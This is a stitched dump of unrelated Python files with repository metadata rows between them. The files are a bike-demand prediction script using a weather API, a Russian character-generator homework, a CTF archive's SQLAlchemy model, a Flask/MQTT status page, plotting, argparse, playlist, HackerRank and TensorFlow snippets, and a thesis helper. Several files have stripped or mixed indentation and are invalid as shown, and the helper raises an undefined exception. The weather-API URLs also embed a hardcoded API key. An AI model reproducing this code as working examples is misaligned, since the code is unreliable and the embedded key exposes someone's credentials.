""" Predict all given days. Returns a dataframe with date and prediction """
    if not type(days) == pd.core.series.Series:
      raise TypeError("Please pass days as a pandas Series, e.g. days = df['date']")
df = pd.DataFrame()
df["date"] = days
df['temperature']=temperatures
df['precipitation']=precipitations
df['snowdepth']=snowdepths
df['windspeed']=windspeeds
df['sunshine']=sunshines
df['is_holiday']=is_holidays
df = self.enrich_df(df)
model = load_pickle(os.path.join(path_to_models, station_string + ".model"))
df["prediction"] = model.predict(df)
return df[["date", "prediction"]]
if __name__ == "__main__":
# instance of class
BP = BikePrediction()
# run training on all classes
#BP.train()
lat = '48.130472'
lon = '11.581846'
date_day = datetime(2020,3,23)
  stations = requests.get(
    'https://api.meteostat.net/v1/stations/nearby?lat={}&lon={}&limit=20&key=L8ouyjgU'.format(lat, lon))
#loop over next stations if current station has no data for today
for station in stations.json()['data']:
print('station_tried', station)
print(str(date_day).split()[0])
closest_station = station['id']
    weather_data = requests.get(
      'https://api.meteostat.net/v1/history/daily?station={}&start={}&end={}&key=L8ouyjgU'.format(
        closest_station, str(date_day).split()[0], str(date_day).split()[0]))
if weather_data.json()['data']:
print('last reading at station on: ', weather_data.json()['data'][-1]['date'])
print('date today', str(date_day).split()[0])
if weather_data.json()['data'] and weather_data.json()['data'][-1]['date'] == str(date_day).split()[0] :
break
print(weather_data.json()['data'])
  temperature, precipitation, snowdepth, windspeed, sunshine = list(
    weather_data.json()['data'][0][key]
    for key in ['temperature', 'precipitation', 'snowdepth', 'windspeed', 'sunshine'])
province_public_holidays = []
geolocator = Nominatim(user_agent="specify_your_app_name_here")
location = geolocator.reverse(str(lat) + "," + str(lon))
  # fall back to the city when the reverse-geocoded address has no state
  if 'state' in location.raw['address']:
    province = location.raw['address']['state']
  else:
    province = location.raw['address']['city']
  province_abb = BikePrediction.province_abbs[province]  # the mapping is defined on the class
print(date_day.year)
for date in holidays.DE(years=date_day.year, prov=province_abb):
province_public_holidays.append(str(date))
#print(station_weather_df)
  is_holiday = 1 if str(date_day).split()[0] in province_public_holidays else 0  # compare the date part only
# make a single prediction
prediction = BP.predict_single(
station_string="Munich (DE)",
day=date_day,
temperature=temperature or 0,
precipitation=precipitation or 0,
snowdepth=snowdepth or 0,
windspeed=windspeed or 0,
sunshine=sunshine or 0,
is_holiday=is_holiday or 0
)
print(prediction)
  # df_new (historical data with weather columns) is assumed to be loaded elsewhere
  df_munich = df_new[df_new['name']=='Munich (DE)']
BP.predict_series(
station_string="Munich (DE)",
days=df_munich.date,
temperatures=df_munich.temperature,
precipitations=df_munich.precipitation,
snowdepths=df_munich.snowdepth,
windspeeds=df_munich.windspeed,
sunshines=df_munich.sunshine,
is_holidays=df_munich.is_holiday
)
| 36.788845 | 169 | 0.568334 |
f52e7415b026da7a8ab020f38e84c9fb08a121c8
| 2,401 |
py
|
Python
|
INBa/2015/Ermashov_A_V/task_10_5.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
INBa/2015/Ermashov_A_V/task_10_5.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
INBa/2015/Ermashov_A_V/task_10_5.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Task No. 10, Variant 5
# Write a "Character generator" program for a game. The user gets 30 points to distribute among four attributes: Strength, Health, Wisdom and Agility. The user must be able not only to take points from the common pool, but also to return points to it from attributes they decided to re-assign.
# Ермашов А.В.
# 26.05.2016
print("Добро пожаловать в Генератор персонажей. У тебя есть 30 очков, а также 4 характеристики: Сила, Здоровье, Мудрость и Ловкость. Ты можете брать из общего числа пула и можешь возвращать их туда из характеристик. УДАЧИ!")
Sila=0
Zdorovye=0
Mudrosty=0
Lovkosty=0
ochki=30
chislo=0
print("Чтобы выбрать характеристику, просто напиши её так как она написана(начинай с заглавной буквы)")
while True:
if Sila<0 or Zdorovye<0 or Mudrosty<0 or Lovkosty<0 or ochki>30:
print("Ошибка")
break
elif ochki==0:
print("Все очки распределены. Их распределение:\nСила:",Sila,"\nЗдоровье:",Zdorovye,"\nМудрость:",Mudrosty,"\nЛовкость:",Lovkosty)
break
print("Ваши очки:\nСила:",Sila,"\nЗдоровье:",Zdorovye,"\nМудрость:",Mudrosty,"\nЛовкость:",Lovkosty,"\nНераспределённые очки:",ochki)
user_input=input("Введите характеристику:")
if user_input=="Сила" :
chislo=int(input("Напиши сколько ты хочешь прибавить или отбавить(Если отбавить то пишешь число со знаком минус перед ним):"))
if chislo <= ochki :
Sila+=chislo
ochki-=chislo
else :
print("Вы превысили допустимый лимит очков")
elif user_input=="Здоровье":
chislo=int(input("Напиши сколько ты хочешь прибавить или отбавить(Если отбавить то пишешь число со знаком минус перед ним):"))
if chislo <= ochki :
Zdorovye+=chislo
ochki-=chislo
else :
print("Вы превысили допустимый лимит очков" )
elif user_input=="Мудрость":
chislo=int(input("Напиши сколько ты хочешь прибавить или отбавить(Если отбавить то пишешь число со знаком минус перед ним):"))
if chislo <= ochki :
Mudrosty+=chislo
ochki-=chislo
else :
print("Вы превысили допустимый лимит очков" )
elif user_input=="Ловкость":
chislo=int(input("Напиши сколько ты хочешь прибавить или отбавить(Если отбавить то пишешь число со знаком минус перед ним):"))
if chislo <= ochki :
Lovkosty+=chislo
ochki-=chislo
else :
print("Вы превысили допустимый лимит очков" )
input("\nНажмите Enter для выхода.")
| 46.173077 | 372 | 0.747189 |
194249a70283ca015fe686021658a5a2c2c738a3
| 1,144 |
py
|
Python
|
LINE/2021/web/diveinternal/private/app/datamodel.py
|
mystickev/ctf-archives
|
89e99a5cd5fb6b2923cad3fe1948d3ff78649b4e
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
LINE/2021/web/diveinternal/private/app/datamodel.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
LINE/2021/web/diveinternal/private/app/datamodel.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-12-19T11:06:24.000Z
|
2021-12-19T11:06:24.000Z
|
import os
from datetime import date, datetime, timedelta
from sqlalchemy import create_engine, ForeignKeyConstraint
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Integer, Date, Table, Boolean, ForeignKey, DateTime, BLOB, Text, JSON, Float
from sqlalchemy.orm import relationship, backref
Base = declarative_base()
class Database:
SQLITE = 'sqlite'
DB_ENGINE = {
SQLITE: 'sqlite:///{DB}'
}
# Main DB Connection Ref Obj
dbEngine = None
sdbType = SQLITE
if sdbType in DB_ENGINE.keys():
engineUrl = DB_ENGINE[sdbType].format(DB=os.environ['DBFILE'])
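        # check_same_thread=False lets the single SQLite connection be shared across threads (e.g. Flask request handlers)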
dbEngine = create_engine(engineUrl,connect_args={'check_same_thread': False})
session = sessionmaker(bind=dbEngine,expire_on_commit=False)
else:
print("DBType is not found in DB_ENGINE")
class Subscriber(Base):
__tablename__ = 'Subscriber'
id = Column(Integer, primary_key=True)
email = Column(String)
date = Column(String)
def __init__(self, email, date):
self.email = email
self.date = date
| 29.333333 | 115 | 0.708916 |
2744ee99315c2d562075cfab9fe766fac90ae2f1
| 3,686 |
py
|
Python
|
app/__init__.py
|
MedPhyDO/app-skeleton
|
1161736ccf356c704c6c13b17fa11aca64b17dac
|
[
"MIT"
] | 1 |
2021-02-25T13:45:24.000Z
|
2021-02-25T13:45:24.000Z
|
app/__init__.py
|
MedPhyDO/app-skeleton
|
1161736ccf356c704c6c13b17fa11aca64b17dac
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
MedPhyDO/app-skeleton
|
1161736ccf356c704c6c13b17fa11aca64b17dac
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
The actual startup of the app is handled via run
'''
import logging
from isp.config import ispConfig
from app.db import dbtests
from isp.webapp import ispBaseWebApp
from isp.safrs import system, db
class system( system ):
@classmethod
def _extendedSystemCheck(self):
"""filled Stub Function for api_list (Systeminformationen)
Returns
-------
dict, string
"""
import os
import json
config = ispConfig()
html = "<h4>System Check</h4>"
# --------------- MQTT
mqtt_config = config.get( "server.mqtt" )
mqtt_config_copy = mqtt_config.copy()
mqtt_config_copy.password = "********"
if mqtt_config_copy.get("host", "") == "":
html += '<div class="alert alert-info" >MQTT deaktiviert'
else:
html += '<div class="alert alert-dark" >Prüfe <span class="badge badge-info">server.mqtt</span> - Konfiguration:'
html += '<pre>{}</pre>'.format( json.dumps( mqtt_config_copy.toDict(), indent=2 ) )
mqtt = config.mqttGetHandler()
if not mqtt:
info_class = "danger"
info_text = "MQTT Zugriff ist nicht möglich."
else:
info_class = "info"
info_text = 'MQTT Zugriff ist eingerichtet. <button type="button" class="btn btn-primary" onClick="mqttTest( this )">Prüfen</button>'
html += '<div id="MQTT-checkline" class="alert alert-{} ">{}<div id="MQTT-results" class"alert"></div></div>'.format( info_class, info_text )
html += "</div>"
html += '''
<script>
var box = document.querySelector("#MQTT-checkline");
var result_box = document.querySelector("#MQTT-results");
if ( typeof app.clientMqtt === "object" ) {
app.clientMqtt.subscribe( "MQTT/test", function( msg ) {
box.className = "alert alert-success";
result_box.className = "alert alert-success";
result_box.innerHTML = "MQTT Test erfolgreich";
} );
}
function mqttTest( btn ){
box.className = "alert alert-info";
result_box.className = "";
if ( typeof app.clientMqtt === "object" ) {
result_box.className = "alert alert-danger";
result_box.innerHTML = "MQTT Test nicht erfolgreich.";
app.clientMqtt.publish( "MQTT/test", { "test":"MQTT" } );
} else {
result_box.className = "alert alert-warning";
result_box.innerHTML = "kein clientMqtt vorhanden";
}
}
</script>
'''
return {}, html
# -----------------------------------------------------------------------------
def run( overlay:dict={} ):
    ''' Starts ispBaseWebApp with additional config settings
    Parameters
    ----------
    overlay : dict, optional
        Overlay settings for the config. The default is {}.
    Returns
    -------
    webApp : ispBaseWebApp
        The started web application
    '''
    # open the configuration
    _config = ispConfig( mqttlevel=logging.WARNING )
_apiConfig = {
"models": [ dbtests, system ],
}
    # start the web server
    webApp = ispBaseWebApp( _config, db, apiconfig=_apiConfig, overlay=overlay )
    # close mqtt in the config
    _config.mqttCleanup( )
return webApp
| 33.509091 | 154 | 0.518719 |
d0231afe20a33774afadfa903448f23f5a613d43
| 1,566 |
py
|
Python
|
results/plot_test1.py
|
OxfordSKA/FSCN
|
fc7b01f989553158b3b4d4b66f973cf0f9387998
|
[
"BSD-3-Clause"
] | null | null | null |
results/plot_test1.py
|
OxfordSKA/FSCN
|
fc7b01f989553158b3b4d4b66f973cf0f9387998
|
[
"BSD-3-Clause"
] | null | null | null |
results/plot_test1.py
|
OxfordSKA/FSCN
|
fc7b01f989553158b3b4d4b66f973cf0f9387998
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.ticker import FormatStrFormatter
def main():
df = pd.read_csv('test1.txt', delim_whitespace=True, header=0)
uniform = df.loc[df['weight'] == 'U']
natural = df.loc[df['weight'] == 'N']
# TODO(BM) plot the predicted noise..
opts = dict(marker='.', ms=10)
fig, (ax1, ax2) = plt.subplots(figsize=(8, 8), nrows=2, sharex=False)
fig.subplots_adjust(left=0.125, bottom=0.1, right=0.95, top=0.95,
wspace=0.2, hspace=0.1)
ax1.plot(uniform['num_times'], uniform['rms'], label='uniform', **opts)
ax1.plot(natural['num_times'], natural['rms'], label='natural', **opts)
ax1.legend(frameon=True)
ax1.grid()
ax1.set_xscale('log')
ax1.set_yscale('log')
ax1.set_xlim(0, uniform['num_times'].max()*1.1)
ax1.set_ylabel('Image RMS (Jy/beam)')
ax1.xaxis.set_major_formatter(FormatStrFormatter('%i'))
y = uniform['rms'].values / natural['rms'].values
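    # a ratio above 1 means uniform weighting gives a noisier image than natural weighting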
ax2.plot(uniform['num_times'], y, **opts)
ax2.grid()
ax2.set_xlabel('number of snapshots')
ax2.set_ylabel('uniform rms / natural rms')
ax2.set_xlabel('number of snapshots')
ax2.set_xscale('log')
ax2.set_xlim(0, uniform['num_times'].max() * 1.1)
ax2.xaxis.set_major_formatter(FormatStrFormatter('%i'))
fig.savefig('test1.eps')
plt.close(fig)
if __name__ == '__main__':
main()
| 34.8 | 75 | 0.642401 |
d02bd4e1b3583c2a04099a5fdc72c37a0ead4e39
| 1,016 |
py
|
Python
|
Python/zzz_training_challenge/UdemyPythonPro/Chapter5_Functions/Functions/command_line_arguments2.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/UdemyPythonPro/Chapter5_Functions/Functions/command_line_arguments2.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/UdemyPythonPro/Chapter5_Functions/Functions/command_line_arguments2.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
import argparse
def main():
    # create the parser
    parser = argparse.ArgumentParser()
    # add arguments:
    # name: starts with '--' by convention
    # help: optional help text
    # type: optional argument type
    # required: whether the argument is mandatory
    #
parser.add_argument("--age", help="Enter your age (int)", type=int, required=True)
parser.add_argument("--name", help="Enter your name (str)", type=str, required=True)
parser.add_argument("--admin", help="Are your an admin? (bool)", type=bool, required=False)
    # parse the arguments and access the values
args = parser.parse_args()
age = args.age
name = args.name
is_admin = args.admin
print(age, type(age))
print(name, type(name))
    # Caution: arguments arrive as strings! Even with type=bool,
    # passing "False" yields a non-empty string, which
    # converts to True.
print(is_admin, type(is_admin))
if __name__ == "__main__":
main()
| 32.774194 | 95 | 0.667323 |
ef8f890ecaa6580bfa9a5121d7900b54ad858e04
| 1,191 |
py
|
Python
|
site/public/courses/CS-1.2/src/PlaylistLinkedList-StarterCode/Playlist.py
|
KitsuneNoctus/makeschool
|
5eec1a18146abf70bb78b4ee3d301f6a43c9ede4
|
[
"MIT"
] | 1 |
2021-08-24T20:22:19.000Z
|
2021-08-24T20:22:19.000Z
|
site/public/courses/CS-1.2/src/PlaylistLinkedList-StarterCode/Playlist.py
|
KitsuneNoctus/makeschool
|
5eec1a18146abf70bb78b4ee3d301f6a43c9ede4
|
[
"MIT"
] | null | null | null |
site/public/courses/CS-1.2/src/PlaylistLinkedList-StarterCode/Playlist.py
|
KitsuneNoctus/makeschool
|
5eec1a18146abf70bb78b4ee3d301f6a43c9ede4
|
[
"MIT"
] | null | null | null |
from Song import Song
class Playlist:
def __init__(self):
self.__first_song = None
# TODO: Create a method called add_song that creates a Song object and adds it to the playlist. This method has one parameter called title.
def add_song(self, title):
pass
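    # A possible linked-list sketch (illustrative only; it assumes the Song
    # objects expose `next` and `title` attributes, which this starter code
    # does not guarantee):
    #     new_song = Song(title)
    #     if self.__first_song is None:
    #         self.__first_song = new_song
    #     else:
    #         current = self.__first_song
    #         while current.next is not None:
    #             current = current.next
    #         current.next = new_song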
    # TODO: Create a method called find_song that searches for whether a song exists in the playlist and returns its index.
    # The method has one parameter, title, which is the title of the song to be searched for. If the song is found, return its index. Otherwise, return -1.
def find_song(self, title):
pass
# TODO: Create a method called remove_song that removes a song from the playlist. This method takes one parameter, title, which is the song that should be removed.
def remove_song(self, title):
pass
# TODO: Create a method called length, which returns the number of songs in the playlist.
def length(self):
pass
# TODO: Create a method called print_songs that prints a numbered list of the songs in the playlist.
# Example:
# 1. Song Title 1
# 2. Song Title 2
# 3. Song Title 3
def print_songs(self):
pass
| 25.891304 | 167 | 0.690176 |
3ea06fc23eba7a15e79146a7206c8b0fa513c80e
| 1,012 |
py
|
Python
|
Interview Preparation Kits/Interview Preparation Kit/Search/Maximum Subarray Sum/maximum_subarray.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | 1 |
2021-02-22T17:37:45.000Z
|
2021-02-22T17:37:45.000Z
|
Interview Preparation Kits/Interview Preparation Kit/Search/Maximum Subarray Sum/maximum_subarray.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | null | null | null |
Interview Preparation Kits/Interview Preparation Kit/Search/Maximum Subarray Sum/maximum_subarray.py
|
xuedong/hacker-rank
|
ce8a60f80c2c6935b427f9409d7e826ee0d26a89
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the maximumSum function below.
def maximumSum(a, m):
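    # Idea: with prefix sums modulo m, the sum of a[i+1..j] mod m equals
    # (prefix[j] - prefix[i]) mod m. After sorting the prefixes, adjacent
    # pairs whose original indices are inverted give the smallest positive
    # difference, so the answer is max(m - smallest, largest prefix).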
n = len(a)
prefix = [0] * n
current = 0
for i in range(n):
current = (a[i] % m + current) % m
prefix[i] = current
sorted_prefix = sorted(prefix)
sorted_index = sorted(range(n), key=lambda k: prefix[k])
smallest = m
for i in range(n-1):
if sorted_index[i] > sorted_index[i+1]:
diff = sorted_prefix[i+1] - sorted_prefix[i]
if diff < smallest:
smallest = diff
return max(m-smallest, sorted_prefix[n-1])
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
q = int(input())
for q_itr in range(q):
nm = input().split()
n = int(nm[0])
m = int(nm[1])
a = list(map(int, input().rstrip().split()))
result = maximumSum(a, m)
fptr.write(str(result) + '\n')
fptr.close()
| 20.24 | 60 | 0.544466 |
f5ee30ccae569645ce207a8f4ba4d950c86b7b1d
| 112 |
py
|
Python
|
python/python_backup/Python_Progs/PYTHON_LEGACY_PROJECTS/Ineger_manupulation.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/python_backup/Python_Progs/PYTHON_LEGACY_PROJECTS/Ineger_manupulation.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/python_backup/Python_Progs/PYTHON_LEGACY_PROJECTS/Ineger_manupulation.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
a=int(input("Input an integer :"))
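# Builds n, nn and nnn by repeating the string form of a, then sums them
# (e.g. a=5 -> 5 + 55 + 555 = 615).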
n1=int("%s"%a)
n2=int("%s%s"%(a,a))
n3=int("%s%s%s"%(a,a,a))
print(n1+n2+n3)
| 18.666667 | 34 | 0.544643 |
725354e8ddaa17b28ac550df26d697d82cdb31f9
| 829 |
py
|
Python
|
785A-anton-and-polyhedrons.py
|
spreusler/codeforces-loesungen
|
cc8ddcc8a3c5a25906dc92ad001f7e9570a62de3
|
[
"MIT"
] | null | null | null |
785A-anton-and-polyhedrons.py
|
spreusler/codeforces-loesungen
|
cc8ddcc8a3c5a25906dc92ad001f7e9570a62de3
|
[
"MIT"
] | null | null | null |
785A-anton-and-polyhedrons.py
|
spreusler/codeforces-loesungen
|
cc8ddcc8a3c5a25906dc92ad001f7e9570a62de3
|
[
"MIT"
] | null | null | null |
# Name: 785 A. Anton and Polyhedrons
# URL: https://codeforces.com/problemset/problem/785/A
# Language: Python 3.x
def main():
    # variable for the sum of faces
sum_faces = 0
    # read the input as an integer
n = int(input())
    # create a dictionary with string keys and integer values
faces = {
"Tetrahedron": 4,
"Cube": 6,
"Octahedron": 8,
"Dodecahedron": 12,
"Icosahedron": 20,
}
    # loop while n is greater than zero; stops when n reaches zero
while n > 0:
        # sum up the individual values by looking up the key read via input()
sum_faces += faces[input()]
        # count down; once n equals zero, no further input() call happens
n -= 1
print(sum_faces)
if __name__ == '__main__':
main()
| 25.121212 | 79 | 0.617612 |
f8276cee39a98985581fcb136de92e1625ba9d12
| 1,720 |
py
|
Python
|
.archive/parse.py
|
gt-big-data/TEDVis
|
328a4c62e3a05c943b2a303817601aebf198c1aa
|
[
"MIT"
] | null | null | null |
.archive/parse.py
|
gt-big-data/TEDVis
|
328a4c62e3a05c943b2a303817601aebf198c1aa
|
[
"MIT"
] | null | null | null |
.archive/parse.py
|
gt-big-data/TEDVis
|
328a4c62e3a05c943b2a303817601aebf198c1aa
|
[
"MIT"
] | 2 |
2018-02-06T00:00:44.000Z
|
2019-06-04T12:43:41.000Z
|
import os
from os import listdir
from os.path import isfile, join, isdir
from operator import itemgetter, attrgetter
from wiki import filter
from string import punctuation
from nltk.corpus import wordnet as wn
wordDict = {}
def countWords():
onlyfiles = [f for f in listdir(".") if isfile(join(".", f))]
#print(onlyfiles)
#wordDict = {}
for file in onlyfiles:
with open(file) as f:
lines = f.readlines()
for line in lines:
line = line.split()
for word in line:
word = word.lower()
                    word = strip_punctuation(word)
#print(word + " " + tmp[0].pos())
if word not in wordDict:
wordDict[word] = 0
wordDict[word] += 1
def strip_punctuation(s):
return ''.join(c for c in s if c not in punctuation)
path = os.getcwd() + '/TEDVis'
os.chdir(path)
tedTypes = [f for f in listdir(".") if isdir(join(".", f)) and not f.startswith('.')]
#print(os.getcwd())
for folder in tedTypes:
#print(os.getcwd())
os.chdir(folder)
alphabet = [f for f in listdir(".") if isdir(join(".", f)) and not f.startswith('.')]
print(os.getcwd())
for group in alphabet:
os.chdir(group)
#print(os.getcwd())
countWords()
os.chdir('..')
os.chdir('..')
# os.chdir(folder)
# print(os.listdir('.'))
#onlydirs = [f for f in listdir(".") if isdir(join(".", f))]
#os.chdir('..')
filter(wordDict)
wordList = []
adjList = []
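# keep only the words whose first WordNet sense is an adjective ("a")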
for key in wordDict:
tmp = wn.synsets(key)
if (len(tmp) > 0):
if (tmp[0].pos() == "a"):
adjList.append({"word": key, "frequency": wordDict[key]})
adjList = sorted(adjList, key=itemgetter("frequency"), reverse = True)
print(adjList)
# print(len(wordList))
import json
with open('data.json', 'w') as outfile:
json.dump(adjList[:10], outfile)
| 21.234568 | 87 | 0.634302 |
f86d410e53c9a80f8b0be5203525cea36952c3ff
| 37 |
py
|
Python
|
lib/python3.5/functools.py
|
hwroitzsch/BikersLifeSaver
|
469c738fdd6352c44a3f20689b17fa8ac04ad8a2
|
[
"MIT"
] | 1 |
2020-08-16T04:04:23.000Z
|
2020-08-16T04:04:23.000Z
|
lib/python3.5/functools.py
|
hwroitzsch/BikersLifeSaver
|
469c738fdd6352c44a3f20689b17fa8ac04ad8a2
|
[
"MIT"
] | 5 |
2020-06-05T18:53:24.000Z
|
2021-12-13T19:49:15.000Z
|
lib/python3.5/functools.py
|
hwroitzsch/BikersLifeSaver
|
469c738fdd6352c44a3f20689b17fa8ac04ad8a2
|
[
"MIT"
] | null | null | null |
/usr/local/lib/python3.5/functools.py
| 37 | 37 | 0.810811 |
f8b5e06c38ed307233d83b8f9d69c32d088b385a
| 270 |
py
|
Python
|
Crashkurs TensorFlow/07_Stack.py
|
slogslog/Coding-Kurzgeschichten
|
9b08237038147c6c348d4cf4c69567178e07dd1d
|
[
"Unlicense"
] | 2 |
2020-03-23T14:57:50.000Z
|
2021-03-24T18:12:07.000Z
|
Crashkurs TensorFlow/07_Stack.py
|
slogslog/Coding-Kurzgeschichten
|
9b08237038147c6c348d4cf4c69567178e07dd1d
|
[
"Unlicense"
] | null | null | null |
Crashkurs TensorFlow/07_Stack.py
|
slogslog/Coding-Kurzgeschichten
|
9b08237038147c6c348d4cf4c69567178e07dd1d
|
[
"Unlicense"
] | null | null | null |
# Suppresses the AVX2 warning
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import tensorflow as tf
a2d = tf.constant([ [1,2,3], [4,5,6] ])
print(a2d)
b2d = tf.reshape(tf.range(7, 13), [2, -1])
print(b2d)
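# tf.stack joins the two (2, 3) tensors along a new leading axis -> shape (2, 2, 3)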
c3d = tf.stack([a2d, b2d])
print(c3d)
print(c3d.numpy())
| 16.875 | 42 | 0.662963 |
f8c3d98f1a948dc486ed3431ba7f098d343daa1b
| 207 |
py
|
Python
|
SoSe-21/Code-Vorlesungen/VL-5/Mathematische-Brechnungen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | 1 |
2022-03-23T09:40:39.000Z
|
2022-03-23T09:40:39.000Z
|
SoSe-21/Code-Vorlesungen/VL-5/Mathematische-Brechnungen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
SoSe-21/Code-Vorlesungen/VL-5/Mathematische-Brechnungen.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
PI = 3.1415 # global variable
def kreisumfang(radius):
kreisumfang = 2 * PI * radius
return kreisumfang
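# lateral surface of a cylinder: height times the circumference of its base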
def zylinder(radius, hoehe):
return hoehe * kreisumfang(radius)
print(zylinder(50, 20))
| 20.7 | 38 | 0.705314 |
e45704b6bef449eb6fe43f4d7767f2ac312cf726
| 5,145 |
py
|
Python
|
Apps/Auswertung/helper.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | 1 |
2021-04-13T10:00:46.000Z
|
2021-04-13T10:00:46.000Z
|
Apps/Auswertung/helper.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | null | null | null |
Apps/Auswertung/helper.py
|
RGreinacher/bachelor-thesis
|
60dbc03ce40e3ec42f2538d67a6aabfea6fbbfc8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# import python libs
import re
import json
import csv
import argparse
import json
import collections
import copy
from os import listdir
from os.path import isfile, join
from pprint import pprint as pp
from operator import itemgetter
# import project libs
from constants import *
# methods
def read_subject_table():
return read_json_file(SUBJECTS_TABEL_JSON)
def read_json_file(file_name):
file_handler = open(file_name, 'r', encoding='utf-8')
raw_content = file_handler.read()
file_handler.close()
return json.JSONDecoder().decode(raw_content)
def read_corpus_files(path, subject_id = -1):
corpus = []
if subject_id >= 0:
path = "%sVP%s/" % (path, str(subject_id).zfill(2))
for file_name in sorted(listdir(path)):
file_path = join(path, file_name)
if not (isfile(file_path) and (file_name.endswith('.json') or file_name.endswith('.txt'))): continue
if 'VP vorbereitet' in path and file_name.startswith('a_'): continue # ignore raw questionnaire documents
file_handler = open(path + file_name, 'r', encoding='utf-8')
raw_content = file_handler.read()
file_handler.close()
        decoded_content = json.JSONDecoder().decode(raw_content)
        corpus.append(decoded_content)
return corpus
def reward_for_subject(subject_id):
for reward_index, subject_list in enumerate(REWARDS):
if subject_id in subject_list:
return reward_index
raise NoRewardForSubjectError
def corpus_runner(annotated_corpus):
paragraphs = 0 # total number of paragraphs
sentences = 0 # total number of sentences
tokens = 0 # total tokens
annotations = 0 # chunks
words = 0 # words in chunks
for document in annotated_corpus:
for paragraph in document['data']:
paragraphs += 1
for sentence in paragraph:
sentences += 1
tokens += len(sentence)
for token in sentence:
if 'annotation' in token:
annotations += 1
words += token['annotation']['length']
return (paragraphs, sentences, tokens, annotations, words)
def annotation_durations(subjects_table, annotated_corpus):
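    # walk the paragraph durations in document order and regroup them into
    # blocks whose lengths are given by subjects_table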
durations_per_block = [[]]
block_index = 0
paragraph_index_per_block = -1
for document in annotated_corpus:
durations = document['annotation_duration_per_paragraph']
for paragraph_index in range(0, len(document['data'])):
paragraph_index_per_block += 1
if paragraph_index_per_block == len(subjects_table[block_index]):
durations_per_block.append([])
block_index += 1
paragraph_index_per_block = 0
durations_per_block[block_index].append(durations[paragraph_index])
return durations_per_block
def distribution_per_block(block):
total_class_distribution = [0, 0, 0, 0, 0, 0]
for paragraph in block:
for sentence in paragraph:
for annotation_class in sentence:
total_class_distribution[annotation_class] += 1
return total_class_distribution
def paragraph_is_annotated(paragraph):
for sentence in paragraph:
for token in sentence:
if 'annotation' in token:
return True
return False
def empty_subjects_table(subjects_table):
first_subject = subjects_table[0]
second_subject = subjects_table[1]
empty_blocks = []
if subject_table_block_is_annotated(first_subject[0]):
empty_blocks.append(second_subject[0])
empty_blocks.append(first_subject[1])
empty_blocks.append(second_subject[2])
empty_blocks.append(first_subject[3])
else:
empty_blocks.append(first_subject[0])
empty_blocks.append(second_subject[1])
empty_blocks.append(first_subject[2])
empty_blocks.append(second_subject[3])
return empty_blocks
def subject_table_block_is_annotated(block):
for paragraph in block:
for sentence in paragraph:
if sum(sentence) != len(sentence) * 5:
return True
return False
def annotations_per_subject_table_block(block):
annotations = 0
for paragraph in block:
for sentence in paragraph:
annotations += len(sentence)
return annotations
def next_annotation_index(start, sentence):
current_index = start
for token in sentence[start:]:
if 'annotation' in token:
return current_index
current_index += 1
return -1
def seconds_to_min(seconds):
minutes = int(seconds / 60)
seconds = (seconds % 60)
if seconds < 10:
seconds = "0" + str(seconds)
return "%s:%s" % (minutes, seconds)
def save_json(data, file_name):
with open(file_name, 'w') as outfile:
json.dump(data, outfile)
def save_csv(data_frame_list):
myfile = open(CSV_DATA_FILE_NAME, 'w')
csv_writer = csv.writer(myfile, delimiter=';')
csv_writer.writerow(DATA_FRAME_HEADER)
